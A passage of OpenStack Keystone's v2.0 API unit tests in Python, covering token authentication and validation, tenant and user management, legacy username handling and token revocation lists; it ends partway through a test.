acdfca5f063c1299e5363b4b3022029577260a95 | 54,570 | py | Python | keystone/keystone/tests/unit/test_v2.py | sreenathmenon/openstackTFA | 8c765f2728b82cf78c4d2bfd5c6a36ebf9302f2b | [
"Apache-2.0"
] | null | null | null | keystone/keystone/tests/unit/test_v2.py | sreenathmenon/openstackTFA | 8c765f2728b82cf78c4d2bfd5c6a36ebf9302f2b | [
"Apache-2.0"
] | null | null | null | keystone/keystone/tests/unit/test_v2.py | sreenathmenon/openstackTFA | 8c765f2728b82cf78c4d2bfd5c6a36ebf9302f2b | [
"Apache-2.0"
] | null | null | null | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import time
import uuid
from keystoneclient.common import cms
from oslo_config import cfg
import six
from six.moves import http_client
from testtools import matchers
from keystone.common import extension as keystone_extension
from keystone.tests.unit import ksfixtures
from keystone.tests.unit import rest
CONF = cfg.CONF
class CoreApiTests(object):
def assertValidError(self, error):
self.assertIsNotNone(error.get('code'))
self.assertIsNotNone(error.get('title'))
self.assertIsNotNone(error.get('message'))
def assertValidVersion(self, version):
self.assertIsNotNone(version)
self.assertIsNotNone(version.get('id'))
self.assertIsNotNone(version.get('status'))
self.assertIsNotNone(version.get('updated'))
def assertValidExtension(self, extension):
self.assertIsNotNone(extension)
self.assertIsNotNone(extension.get('name'))
self.assertIsNotNone(extension.get('namespace'))
self.assertIsNotNone(extension.get('alias'))
self.assertIsNotNone(extension.get('updated'))
def assertValidExtensionLink(self, link):
self.assertIsNotNone(link.get('rel'))
self.assertIsNotNone(link.get('type'))
self.assertIsNotNone(link.get('href'))
def assertValidTenant(self, tenant):
self.assertIsNotNone(tenant.get('id'))
self.assertIsNotNone(tenant.get('name'))
self.assertNotIn('domain_id', tenant)
self.assertNotIn('parent_id', tenant)
def assertValidUser(self, user):
self.assertIsNotNone(user.get('id'))
self.assertIsNotNone(user.get('name'))
def assertValidRole(self, tenant):
self.assertIsNotNone(tenant.get('id'))
self.assertIsNotNone(tenant.get('name'))
def test_public_not_found(self):
r = self.public_request(
path='/%s' % uuid.uuid4().hex,
expected_status=http_client.NOT_FOUND)
self.assertValidErrorResponse(r)
def test_admin_not_found(self):
r = self.admin_request(
path='/%s' % uuid.uuid4().hex,
expected_status=http_client.NOT_FOUND)
self.assertValidErrorResponse(r)
def test_public_multiple_choice(self):
r = self.public_request(path='/', expected_status=300)
self.assertValidMultipleChoiceResponse(r)
def test_admin_multiple_choice(self):
r = self.admin_request(path='/', expected_status=300)
self.assertValidMultipleChoiceResponse(r)
def test_public_version(self):
r = self.public_request(path='/v2.0/')
self.assertValidVersionResponse(r)
def test_admin_version(self):
r = self.admin_request(path='/v2.0/')
self.assertValidVersionResponse(r)
def test_public_extensions(self):
r = self.public_request(path='/v2.0/extensions')
self.assertValidExtensionListResponse(
r, keystone_extension.PUBLIC_EXTENSIONS)
def test_admin_extensions(self):
r = self.admin_request(path='/v2.0/extensions')
self.assertValidExtensionListResponse(
r, keystone_extension.ADMIN_EXTENSIONS)
def test_admin_extensions_404(self):
self.admin_request(path='/v2.0/extensions/invalid-extension',
expected_status=http_client.NOT_FOUND)
def test_public_osksadm_extension_404(self):
self.public_request(path='/v2.0/extensions/OS-KSADM',
expected_status=http_client.NOT_FOUND)
def test_admin_osksadm_extension(self):
r = self.admin_request(path='/v2.0/extensions/OS-KSADM')
self.assertValidExtensionResponse(
r, keystone_extension.ADMIN_EXTENSIONS)
def test_authenticate(self):
r = self.public_request(
method='POST',
path='/v2.0/tokens',
body={
'auth': {
'passwordCredentials': {
'username': self.user_foo['name'],
'password': self.user_foo['password'],
},
'tenantId': self.tenant_bar['id'],
},
},
expected_status=200)
self.assertValidAuthenticationResponse(r, require_service_catalog=True)
def test_authenticate_unscoped(self):
r = self.public_request(
method='POST',
path='/v2.0/tokens',
body={
'auth': {
'passwordCredentials': {
'username': self.user_foo['name'],
'password': self.user_foo['password'],
},
},
},
expected_status=200)
self.assertValidAuthenticationResponse(r)
def test_get_tenants_for_token(self):
r = self.public_request(path='/v2.0/tenants',
token=self.get_scoped_token())
self.assertValidTenantListResponse(r)
def test_validate_token(self):
token = self.get_scoped_token()
r = self.admin_request(
path='/v2.0/tokens/%(token_id)s' % {
'token_id': token,
},
token=token)
self.assertValidAuthenticationResponse(r)
def test_invalid_token_404(self):
token = self.get_scoped_token()
self.admin_request(
path='/v2.0/tokens/%(token_id)s' % {
'token_id': 'invalid',
},
token=token,
expected_status=http_client.NOT_FOUND)
def test_validate_token_service_role(self):
self.md_foobar = self.assignment_api.add_role_to_user_and_project(
self.user_foo['id'],
self.tenant_service['id'],
self.role_service['id'])
token = self.get_scoped_token(tenant_id='service')
r = self.admin_request(
path='/v2.0/tokens/%s' % token,
token=token)
self.assertValidAuthenticationResponse(r)
def test_remove_role_revokes_token(self):
self.md_foobar = self.assignment_api.add_role_to_user_and_project(
self.user_foo['id'],
self.tenant_service['id'],
self.role_service['id'])
token = self.get_scoped_token(tenant_id='service')
r = self.admin_request(
path='/v2.0/tokens/%s' % token,
token=token)
self.assertValidAuthenticationResponse(r)
self.assignment_api.remove_role_from_user_and_project(
self.user_foo['id'],
self.tenant_service['id'],
self.role_service['id'])
r = self.admin_request(
path='/v2.0/tokens/%s' % token,
token=token,
expected_status=http_client.UNAUTHORIZED)
def test_validate_token_belongs_to(self):
token = self.get_scoped_token()
path = ('/v2.0/tokens/%s?belongsTo=%s' % (token,
self.tenant_bar['id']))
r = self.admin_request(path=path, token=token)
self.assertValidAuthenticationResponse(r, require_service_catalog=True)
def test_validate_token_no_belongs_to_still_returns_catalog(self):
token = self.get_scoped_token()
path = ('/v2.0/tokens/%s' % token)
r = self.admin_request(path=path, token=token)
self.assertValidAuthenticationResponse(r, require_service_catalog=True)
def test_validate_token_head(self):
"""The same call as above, except using HEAD.
There's no response to validate here, but this is included for the
sake of completely covering the core API.
"""
token = self.get_scoped_token()
self.admin_request(
method='HEAD',
path='/v2.0/tokens/%(token_id)s' % {
'token_id': token,
},
token=token,
expected_status=200)
def test_endpoints(self):
token = self.get_scoped_token()
r = self.admin_request(
path='/v2.0/tokens/%(token_id)s/endpoints' % {
'token_id': token,
},
token=token)
self.assertValidEndpointListResponse(r)
def test_get_tenant(self):
token = self.get_scoped_token()
r = self.admin_request(
path='/v2.0/tenants/%(tenant_id)s' % {
'tenant_id': self.tenant_bar['id'],
},
token=token)
self.assertValidTenantResponse(r)
def test_get_tenant_by_name(self):
token = self.get_scoped_token()
r = self.admin_request(
path='/v2.0/tenants?name=%(tenant_name)s' % {
'tenant_name': self.tenant_bar['name'],
},
token=token)
self.assertValidTenantResponse(r)
def test_get_user_roles_with_tenant(self):
token = self.get_scoped_token()
r = self.admin_request(
path='/v2.0/tenants/%(tenant_id)s/users/%(user_id)s/roles' % {
'tenant_id': self.tenant_bar['id'],
'user_id': self.user_foo['id'],
},
token=token)
self.assertValidRoleListResponse(r)
def test_get_user(self):
token = self.get_scoped_token()
r = self.admin_request(
path='/v2.0/users/%(user_id)s' % {
'user_id': self.user_foo['id'],
},
token=token)
self.assertValidUserResponse(r)
def test_get_user_by_name(self):
token = self.get_scoped_token()
r = self.admin_request(
path='/v2.0/users?name=%(user_name)s' % {
'user_name': self.user_foo['name'],
},
token=token)
self.assertValidUserResponse(r)
def test_create_update_user_invalid_enabled_type(self):
# Enforce usage of boolean for 'enabled' field
token = self.get_scoped_token()
# Test CREATE request
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'enabled': "False",
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
# In JSON, 0|1 are not booleans
'enabled': 0,
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
# Test UPDATE request
path = '/v2.0/users/%(user_id)s' % {
'user_id': self.user_foo['id'],
}
r = self.admin_request(
method='PUT',
path=path,
body={
'user': {
'enabled': "False",
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
r = self.admin_request(
method='PUT',
path=path,
body={
'user': {
# In JSON, 0|1 are not booleans
'enabled': 1,
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
def test_create_update_user_valid_enabled_type(self):
# Enforce usage of boolean for 'enabled' field
token = self.get_scoped_token()
# Test CREATE request
self.admin_request(method='POST',
path='/v2.0/users',
body={
'user': {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'enabled': False,
},
},
token=token,
expected_status=200)
def test_error_response(self):
"""This triggers assertValidErrorResponse by convention."""
self.public_request(path='/v2.0/tenants',
expected_status=http_client.UNAUTHORIZED)
def test_invalid_parameter_error_response(self):
token = self.get_scoped_token()
bad_body = {
'OS-KSADM:service%s' % uuid.uuid4().hex: {
'name': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
},
}
res = self.admin_request(method='POST',
path='/v2.0/OS-KSADM/services',
body=bad_body,
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(res)
res = self.admin_request(method='POST',
path='/v2.0/users',
body=bad_body,
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(res)
def _get_user_id(self, r):
"""Helper method to return user ID from a response.
This needs to be overridden by child classes
based on their content type.
"""
raise NotImplementedError()
def _get_role_id(self, r):
"""Helper method to return a role ID from a response.
This needs to be overridden by child classes
based on their content type.
"""
raise NotImplementedError()
def _get_role_name(self, r):
"""Helper method to return role NAME from a response.
This needs to be overridden by child classes
based on their content type.
"""
raise NotImplementedError()
def _get_project_id(self, r):
"""Helper method to return project ID from a response.
This needs to be overridden by child classes
based on their content type.
"""
raise NotImplementedError()
def assertNoRoles(self, r):
"""Helper method to assert No Roles
This needs to be overridden by child classes
based on their content type.
"""
raise NotImplementedError()
def test_update_user_tenant(self):
token = self.get_scoped_token()
# Create a new user
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'tenantId': self.tenant_bar['id'],
'enabled': True,
},
},
token=token,
expected_status=200)
user_id = self._get_user_id(r.result)
# Check if member_role is in tenant_bar
r = self.admin_request(
path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
'project_id': self.tenant_bar['id'],
'user_id': user_id
},
token=token,
expected_status=200)
self.assertEqual(CONF.member_role_name, self._get_role_name(r.result))
# Create a new tenant
r = self.admin_request(
method='POST',
path='/v2.0/tenants',
body={
'tenant': {
'name': 'test_update_user',
'description': 'A description ...',
'enabled': True,
},
},
token=token,
expected_status=200)
project_id = self._get_project_id(r.result)
# Update user's tenant
r = self.admin_request(
method='PUT',
path='/v2.0/users/%(user_id)s' % {
'user_id': user_id,
},
body={
'user': {
'tenantId': project_id,
},
},
token=token,
expected_status=200)
# 'member_role' should be in new_tenant
r = self.admin_request(
path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
'project_id': project_id,
'user_id': user_id
},
token=token,
expected_status=200)
self.assertEqual('_member_', self._get_role_name(r.result))
# 'member_role' should not be in tenant_bar any more
r = self.admin_request(
path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
'project_id': self.tenant_bar['id'],
'user_id': user_id
},
token=token,
expected_status=200)
self.assertNoRoles(r.result)
def test_update_user_with_invalid_tenant(self):
token = self.get_scoped_token()
# Create a new user
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': 'test_invalid_tenant',
'password': uuid.uuid4().hex,
'tenantId': self.tenant_bar['id'],
'enabled': True,
},
},
token=token,
expected_status=200)
user_id = self._get_user_id(r.result)
# Update user with an invalid tenant
r = self.admin_request(
method='PUT',
path='/v2.0/users/%(user_id)s' % {
'user_id': user_id,
},
body={
'user': {
'tenantId': 'abcde12345heha',
},
},
token=token,
expected_status=http_client.NOT_FOUND)
def test_update_user_with_invalid_tenant_no_prev_tenant(self):
token = self.get_scoped_token()
# Create a new user
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': 'test_invalid_tenant',
'password': uuid.uuid4().hex,
'enabled': True,
},
},
token=token,
expected_status=200)
user_id = self._get_user_id(r.result)
# Update user with an invalid tenant
r = self.admin_request(
method='PUT',
path='/v2.0/users/%(user_id)s' % {
'user_id': user_id,
},
body={
'user': {
'tenantId': 'abcde12345heha',
},
},
token=token,
expected_status=http_client.NOT_FOUND)
def test_update_user_with_old_tenant(self):
token = self.get_scoped_token()
# Create a new user
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'tenantId': self.tenant_bar['id'],
'enabled': True,
},
},
token=token,
expected_status=200)
user_id = self._get_user_id(r.result)
# Check if member_role is in tenant_bar
r = self.admin_request(
path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
'project_id': self.tenant_bar['id'],
'user_id': user_id
},
token=token,
expected_status=200)
self.assertEqual(CONF.member_role_name, self._get_role_name(r.result))
# Update user's tenant with old tenant id
r = self.admin_request(
method='PUT',
path='/v2.0/users/%(user_id)s' % {
'user_id': user_id,
},
body={
'user': {
'tenantId': self.tenant_bar['id'],
},
},
token=token,
expected_status=200)
# 'member_role' should still be in tenant_bar
r = self.admin_request(
path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
'project_id': self.tenant_bar['id'],
'user_id': user_id
},
token=token,
expected_status=200)
self.assertEqual('_member_', self._get_role_name(r.result))
def test_authenticating_a_user_with_no_password(self):
token = self.get_scoped_token()
username = uuid.uuid4().hex
# create the user
self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': username,
'enabled': True,
},
},
token=token)
# fail to authenticate
r = self.public_request(
method='POST',
path='/v2.0/tokens',
body={
'auth': {
'passwordCredentials': {
'username': username,
'password': 'password',
},
},
},
expected_status=http_client.UNAUTHORIZED)
self.assertValidErrorResponse(r)
def test_www_authenticate_header(self):
r = self.public_request(
path='/v2.0/tenants',
expected_status=http_client.UNAUTHORIZED)
self.assertEqual('Keystone uri="http://localhost"',
r.headers.get('WWW-Authenticate'))
def test_www_authenticate_header_host(self):
test_url = 'http://%s:4187' % uuid.uuid4().hex
self.config_fixture.config(public_endpoint=test_url)
r = self.public_request(
path='/v2.0/tenants',
expected_status=http_client.UNAUTHORIZED)
self.assertEqual('Keystone uri="%s"' % test_url,
r.headers.get('WWW-Authenticate'))
class LegacyV2UsernameTests(object):
"""Tests to show the broken username behavior in V2.
The V2 API is documented to use `username` instead of `name`. The
API forced used to use name and left the username to fall into the
`extra` field.
These tests ensure this behavior works so fixes to `username`/`name`
will be backward compatible.
"""
def create_user(self, **user_attrs):
"""Creates a users and returns the response object.
:param user_attrs: attributes added to the request body (optional)
"""
token = self.get_scoped_token()
body = {
'user': {
'name': uuid.uuid4().hex,
'enabled': True,
},
}
body['user'].update(user_attrs)
return self.admin_request(
method='POST',
path='/v2.0/users',
token=token,
body=body,
expected_status=200)
def test_create_with_extra_username(self):
"""The response for creating a user will contain the extra fields."""
fake_username = uuid.uuid4().hex
r = self.create_user(username=fake_username)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual(fake_username, user.get('username'))
def test_get_returns_username_from_extra(self):
"""The response for getting a user will contain the extra fields."""
token = self.get_scoped_token()
fake_username = uuid.uuid4().hex
r = self.create_user(username=fake_username)
id_ = self.get_user_attribute_from_response(r, 'id')
r = self.admin_request(path='/v2.0/users/%s' % id_, token=token)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual(fake_username, user.get('username'))
def test_update_returns_new_username_when_adding_username(self):
"""The response for updating a user will contain the extra fields.
This is specifically testing for updating a username when a value
was not previously set.
"""
token = self.get_scoped_token()
r = self.create_user()
id_ = self.get_user_attribute_from_response(r, 'id')
name = self.get_user_attribute_from_response(r, 'name')
enabled = self.get_user_attribute_from_response(r, 'enabled')
r = self.admin_request(
method='PUT',
path='/v2.0/users/%s' % id_,
token=token,
body={
'user': {
'name': name,
'username': 'new_username',
'enabled': enabled,
},
},
expected_status=200)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual('new_username', user.get('username'))
def test_update_returns_new_username_when_updating_username(self):
"""The response for updating a user will contain the extra fields.
This tests updating a username that was previously set.
"""
token = self.get_scoped_token()
r = self.create_user(username='original_username')
id_ = self.get_user_attribute_from_response(r, 'id')
name = self.get_user_attribute_from_response(r, 'name')
enabled = self.get_user_attribute_from_response(r, 'enabled')
r = self.admin_request(
method='PUT',
path='/v2.0/users/%s' % id_,
token=token,
body={
'user': {
'name': name,
'username': 'new_username',
'enabled': enabled,
},
},
expected_status=200)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual('new_username', user.get('username'))
def test_username_is_always_returned_create(self):
"""Username is set as the value of name if no username is provided.
This matches the v2.0 spec where we really should be using username
and not name.
"""
r = self.create_user()
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual(user.get('name'), user.get('username'))
def test_username_is_always_returned_get(self):
"""Username is set as the value of name if no username is provided.
This matches the v2.0 spec where we really should be using username
and not name.
"""
token = self.get_scoped_token()
r = self.create_user()
id_ = self.get_user_attribute_from_response(r, 'id')
r = self.admin_request(path='/v2.0/users/%s' % id_, token=token)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual(user.get('name'), user.get('username'))
def test_username_is_always_returned_get_by_name(self):
"""Username is set as the value of name if no username is provided.
This matches the v2.0 spec where we really should be using username
and not name.
"""
token = self.get_scoped_token()
r = self.create_user()
name = self.get_user_attribute_from_response(r, 'name')
r = self.admin_request(path='/v2.0/users?name=%s' % name, token=token)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual(user.get('name'), user.get('username'))
def test_username_is_always_returned_update_no_username_provided(self):
"""Username is set as the value of name if no username is provided.
This matches the v2.0 spec where we really should be using username
and not name.
"""
token = self.get_scoped_token()
r = self.create_user()
id_ = self.get_user_attribute_from_response(r, 'id')
name = self.get_user_attribute_from_response(r, 'name')
enabled = self.get_user_attribute_from_response(r, 'enabled')
r = self.admin_request(
method='PUT',
path='/v2.0/users/%s' % id_,
token=token,
body={
'user': {
'name': name,
'enabled': enabled,
},
},
expected_status=200)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual(user.get('name'), user.get('username'))
def test_updated_username_is_returned(self):
"""Username is set as the value of name if no username is provided.
This matches the v2.0 spec where we really should be using username
and not name.
"""
token = self.get_scoped_token()
r = self.create_user()
id_ = self.get_user_attribute_from_response(r, 'id')
name = self.get_user_attribute_from_response(r, 'name')
enabled = self.get_user_attribute_from_response(r, 'enabled')
r = self.admin_request(
method='PUT',
path='/v2.0/users/%s' % id_,
token=token,
body={
'user': {
'name': name,
'enabled': enabled,
},
},
expected_status=200)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual(user.get('name'), user.get('username'))
def test_username_can_be_used_instead_of_name_create(self):
token = self.get_scoped_token()
r = self.admin_request(
method='POST',
path='/v2.0/users',
token=token,
body={
'user': {
'username': uuid.uuid4().hex,
'enabled': True,
},
},
expected_status=200)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual(user.get('name'), user.get('username'))
def test_username_can_be_used_instead_of_name_update(self):
token = self.get_scoped_token()
r = self.create_user()
id_ = self.get_user_attribute_from_response(r, 'id')
new_username = uuid.uuid4().hex
enabled = self.get_user_attribute_from_response(r, 'enabled')
r = self.admin_request(
method='PUT',
path='/v2.0/users/%s' % id_,
token=token,
body={
'user': {
'username': new_username,
'enabled': enabled,
},
},
expected_status=200)
self.assertValidUserResponse(r)
user = self.get_user_from_response(r)
self.assertEqual(new_username, user.get('name'))
self.assertEqual(user.get('name'), user.get('username'))
class RestfulTestCase(rest.RestfulTestCase):
def setUp(self):
super(RestfulTestCase, self).setUp()
# TODO(termie): add an admin user to the fixtures and use that user
# override the fixtures, for now
self.assignment_api.add_role_to_user_and_project(
self.user_foo['id'],
self.tenant_bar['id'],
self.role_admin['id'])
class V2TestCase(RestfulTestCase, CoreApiTests, LegacyV2UsernameTests):
def _get_user_id(self, r):
return r['user']['id']
def _get_role_name(self, r):
return r['roles'][0]['name']
def _get_role_id(self, r):
return r['roles'][0]['id']
def _get_project_id(self, r):
return r['tenant']['id']
def _get_token_id(self, r):
return r.result['access']['token']['id']
def assertNoRoles(self, r):
self.assertEqual([], r['roles'])
def assertValidErrorResponse(self, r):
self.assertIsNotNone(r.result.get('error'))
self.assertValidError(r.result['error'])
self.assertEqual(r.result['error']['code'], r.status_code)
def assertValidExtension(self, extension, expected):
super(V2TestCase, self).assertValidExtension(extension)
descriptions = [ext['description'] for ext in six.itervalues(expected)]
description = extension.get('description')
self.assertIsNotNone(description)
self.assertIn(description, descriptions)
self.assertIsNotNone(extension.get('links'))
self.assertNotEmpty(extension.get('links'))
for link in extension.get('links'):
self.assertValidExtensionLink(link)
def assertValidExtensionListResponse(self, r, expected):
self.assertIsNotNone(r.result.get('extensions'))
self.assertIsNotNone(r.result['extensions'].get('values'))
self.assertNotEmpty(r.result['extensions'].get('values'))
for extension in r.result['extensions']['values']:
self.assertValidExtension(extension, expected)
def assertValidExtensionResponse(self, r, expected):
self.assertValidExtension(r.result.get('extension'), expected)
def assertValidUser(self, user):
super(V2TestCase, self).assertValidUser(user)
self.assertNotIn('default_project_id', user)
if 'tenantId' in user:
# NOTE(morganfainberg): tenantId should never be "None", it gets
# filtered out of the object if it is there. This is suspenders
# and a belt check to avoid unintended regressions.
self.assertIsNotNone(user.get('tenantId'))
def assertValidAuthenticationResponse(self, r,
require_service_catalog=False):
self.assertIsNotNone(r.result.get('access'))
self.assertIsNotNone(r.result['access'].get('token'))
self.assertIsNotNone(r.result['access'].get('user'))
# validate token
self.assertIsNotNone(r.result['access']['token'].get('id'))
self.assertIsNotNone(r.result['access']['token'].get('expires'))
tenant = r.result['access']['token'].get('tenant')
if tenant is not None:
# validate tenant
self.assertIsNotNone(tenant.get('id'))
self.assertIsNotNone(tenant.get('name'))
# validate user
self.assertIsNotNone(r.result['access']['user'].get('id'))
self.assertIsNotNone(r.result['access']['user'].get('name'))
if require_service_catalog:
# roles are only provided with a service catalog
roles = r.result['access']['user'].get('roles')
self.assertNotEmpty(roles)
for role in roles:
self.assertIsNotNone(role.get('name'))
serviceCatalog = r.result['access'].get('serviceCatalog')
# validate service catalog
if require_service_catalog:
self.assertIsNotNone(serviceCatalog)
if serviceCatalog is not None:
self.assertIsInstance(serviceCatalog, list)
if require_service_catalog:
self.assertNotEmpty(serviceCatalog)
for service in r.result['access']['serviceCatalog']:
# validate service
self.assertIsNotNone(service.get('name'))
self.assertIsNotNone(service.get('type'))
# services contain at least one endpoint
self.assertIsNotNone(service.get('endpoints'))
self.assertNotEmpty(service['endpoints'])
for endpoint in service['endpoints']:
# validate service endpoint
self.assertIsNotNone(endpoint.get('publicURL'))
def assertValidTenantListResponse(self, r):
self.assertIsNotNone(r.result.get('tenants'))
self.assertNotEmpty(r.result['tenants'])
for tenant in r.result['tenants']:
self.assertValidTenant(tenant)
self.assertIsNotNone(tenant.get('enabled'))
self.assertIn(tenant.get('enabled'), [True, False])
def assertValidUserResponse(self, r):
self.assertIsNotNone(r.result.get('user'))
self.assertValidUser(r.result['user'])
def assertValidTenantResponse(self, r):
self.assertIsNotNone(r.result.get('tenant'))
self.assertValidTenant(r.result['tenant'])
def assertValidRoleListResponse(self, r):
self.assertIsNotNone(r.result.get('roles'))
self.assertNotEmpty(r.result['roles'])
for role in r.result['roles']:
self.assertValidRole(role)
def assertValidVersion(self, version):
super(V2TestCase, self).assertValidVersion(version)
self.assertIsNotNone(version.get('links'))
self.assertNotEmpty(version.get('links'))
for link in version.get('links'):
self.assertIsNotNone(link.get('rel'))
self.assertIsNotNone(link.get('href'))
self.assertIsNotNone(version.get('media-types'))
self.assertNotEmpty(version.get('media-types'))
for media in version.get('media-types'):
self.assertIsNotNone(media.get('base'))
self.assertIsNotNone(media.get('type'))
def assertValidMultipleChoiceResponse(self, r):
self.assertIsNotNone(r.result.get('versions'))
self.assertIsNotNone(r.result['versions'].get('values'))
self.assertNotEmpty(r.result['versions']['values'])
for version in r.result['versions']['values']:
self.assertValidVersion(version)
def assertValidVersionResponse(self, r):
self.assertValidVersion(r.result.get('version'))
def assertValidEndpointListResponse(self, r):
self.assertIsNotNone(r.result.get('endpoints'))
self.assertNotEmpty(r.result['endpoints'])
for endpoint in r.result['endpoints']:
self.assertIsNotNone(endpoint.get('id'))
self.assertIsNotNone(endpoint.get('name'))
self.assertIsNotNone(endpoint.get('type'))
self.assertIsNotNone(endpoint.get('publicURL'))
self.assertIsNotNone(endpoint.get('internalURL'))
self.assertIsNotNone(endpoint.get('adminURL'))
def get_user_from_response(self, r):
return r.result.get('user')
def get_user_attribute_from_response(self, r, attribute_name):
return r.result['user'][attribute_name]
def test_service_crud_requires_auth(self):
"""Service CRUD should return unauthorized without an X-Auth-Token."""
# values here don't matter because it will be unauthorized before
# they're checked (bug 1006822).
service_path = '/v2.0/OS-KSADM/services/%s' % uuid.uuid4().hex
service_body = {
'OS-KSADM:service': {
'name': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
},
}
r = self.admin_request(method='GET',
path='/v2.0/OS-KSADM/services',
expected_status=http_client.UNAUTHORIZED)
self.assertValidErrorResponse(r)
r = self.admin_request(method='POST',
path='/v2.0/OS-KSADM/services',
body=service_body,
expected_status=http_client.UNAUTHORIZED)
self.assertValidErrorResponse(r)
r = self.admin_request(method='GET',
path=service_path,
expected_status=http_client.UNAUTHORIZED)
self.assertValidErrorResponse(r)
r = self.admin_request(method='DELETE',
path=service_path,
expected_status=http_client.UNAUTHORIZED)
self.assertValidErrorResponse(r)
def test_user_role_list_requires_auth(self):
"""User role list return unauthorized without an X-Auth-Token."""
# values here don't matter because it will be unauthorized before
# they're checked (bug 1006815).
path = '/v2.0/tenants/%(tenant_id)s/users/%(user_id)s/roles' % {
'tenant_id': uuid.uuid4().hex,
'user_id': uuid.uuid4().hex,
}
r = self.admin_request(path=path,
expected_status=http_client.UNAUTHORIZED)
self.assertValidErrorResponse(r)
def test_fetch_revocation_list_nonadmin_fails(self):
self.admin_request(
method='GET',
path='/v2.0/tokens/revoked',
expected_status=http_client.UNAUTHORIZED)
def test_fetch_revocation_list_admin_200(self):
token = self.get_scoped_token()
r = self.admin_request(
method='GET',
path='/v2.0/tokens/revoked',
token=token,
expected_status=200)
self.assertValidRevocationListResponse(r)
def assertValidRevocationListResponse(self, response):
self.assertIsNotNone(response.result['signed'])
def _fetch_parse_revocation_list(self):
token1 = self.get_scoped_token()
# TODO(morganfainberg): Because this is making a restful call to the
# app a change to UTCNOW via mock.patch will not affect the returned
# token. The only surefire way to ensure there is not a transient bug
# based upon when the second token is issued is with a sleep. This
# issue all stems from the limited resolution (no microseconds) on the
# expiry time of tokens and the way revocation events utilizes token
# expiry to revoke individual tokens. This is a stop-gap until all
# associated issues with resolution on expiration and revocation events
# are resolved.
time.sleep(1)
token2 = self.get_scoped_token()
self.admin_request(method='DELETE',
path='/v2.0/tokens/%s' % token2,
token=token1)
r = self.admin_request(
method='GET',
path='/v2.0/tokens/revoked',
token=token1,
expected_status=200)
signed_text = r.result['signed']
data_json = cms.cms_verify(signed_text, CONF.signing.certfile,
CONF.signing.ca_certs)
data = json.loads(data_json)
return (data, token2)
def test_fetch_revocation_list_md5(self):
"""If the server is configured for md5, then the revocation list has
tokens hashed with MD5.
"""
# The default hash algorithm is md5.
hash_algorithm = 'md5'
(data, token) = self._fetch_parse_revocation_list()
token_hash = cms.cms_hash_token(token, mode=hash_algorithm)
self.assertThat(token_hash, matchers.Equals(data['revoked'][0]['id']))
def test_fetch_revocation_list_sha256(self):
"""If the server is configured for sha256, then the revocation list has
tokens hashed with SHA256
"""
hash_algorithm = 'sha256'
self.config_fixture.config(group='token',
hash_algorithm=hash_algorithm)
(data, token) = self._fetch_parse_revocation_list()
token_hash = cms.cms_hash_token(token, mode=hash_algorithm)
self.assertThat(token_hash, matchers.Equals(data['revoked'][0]['id']))
def test_create_update_user_invalid_enabled_type(self):
# Enforce usage of boolean for 'enabled' field
token = self.get_scoped_token()
# Test CREATE request
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
# In JSON, "true|false" are not boolean
'enabled': "true",
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
# Test UPDATE request
r = self.admin_request(
method='PUT',
path='/v2.0/users/%(user_id)s' % {
'user_id': self.user_foo['id'],
},
body={
'user': {
# In JSON, "true|false" are not boolean
'enabled': "true",
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
def test_authenticating_a_user_with_an_OSKSADM_password(self):
token = self.get_scoped_token()
username = uuid.uuid4().hex
password = uuid.uuid4().hex
# create the user
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': username,
'OS-KSADM:password': password,
'enabled': True,
},
},
token=token)
# successfully authenticate
self.public_request(
method='POST',
path='/v2.0/tokens',
